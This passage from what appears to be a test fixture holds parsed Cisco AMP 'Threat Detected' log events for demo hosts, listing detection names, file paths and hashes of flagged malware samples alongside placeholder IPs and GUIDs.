"e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 35128, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:21.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", + "cisco.amp.detection_id": "6159251439135752194", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 455000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251439135752000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "t.exe", + "file.path": "\\\\?\\C:\\t.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 36447, + "process.hash.md5": "8b88ebbb05a0e56b7dcc708498c02b3e", + "process.hash.sha1": "cea0890d4b99bae3f635a16dae71f69d137027b9", + "process.hash.sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad", + "process.name": "explorer.exe", + "process.pid": 3164, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:14.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176258981346934873", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 346000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176258981346935000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 38014, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:02.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176258929807327320", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 334000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176258929807327000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 39333, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:14:55.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533668103677542427", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 470000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533668103677542000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 40652, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:14:55.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533668103677542426", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 112000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533668103677542000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 41978, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:14:55.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533668103677542425", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 71000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533668103677542000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 43297, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:13:54.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533667841684537367", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 532000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533667841684537000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 44622, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:13:54.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.DFC.MalParent", + "cisco.amp.detection_id": "6533667841684537366", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 454000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533667841684537000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 45948, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:13:54.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533667841684537365", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 80000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533667841684537000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 47266, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:13:53.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176258118058508361", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 636000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176258118058508000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 48591, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:13:53.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533667837389570068", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 689000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533667837389570000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 49910, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:13:41.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176258066518900808", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 608000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176258066518901000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 51229, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:13:29.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176258014979293255", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 581000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176258014979293000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 52548, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:13:17.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176257963439685702", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 569000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176257963439686000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 53867, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:12:53.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533667579691532307", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 778000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533667579691532000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 55186, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + 